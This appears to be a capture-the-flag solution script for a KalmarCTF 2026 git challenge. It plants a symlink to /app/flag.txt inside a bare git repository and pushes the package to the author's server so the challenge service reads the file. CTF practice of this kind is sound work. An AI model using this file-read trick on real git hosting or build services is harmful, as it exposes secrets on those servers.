Files
ctf/2026/kalmar/misc/git-hoarder/exploit.sh
2026-06-12 00:36:55 +02:00

35 lines
774 B
Bash
Executable File

# 1. Create the base repository with a commit
mkdir base_repo && cd base_repo
git init
git commit --allow-empty -m "init"
cd ..
# 2. Create the bare clone (the payload)
git clone --bare base_repo malicious.git
# 3. Inject the symlink
cd malicious.git
ln -s /app/flag.txt shallow
# 4. Force Git to track the refs directories
mkdir -p refs/heads refs/tags
touch refs/.keep
touch refs/heads/.keep
touch refs/tags/.keep
cd ..
# 5. Wrap it for delivery
mkdir wrapper && cd wrapper
git init
cp -r ../malicious.git .
git add malicious.git
git commit -m "Delivery package with refs tracked"
# 6. Push to your server
git branch -M main
git remote add origin ssh://git@gitea.cato447.de:222/cato447/pwn.git
git push -u origin main -f
cd ..
rm -rf base_repo malicious.git wrapper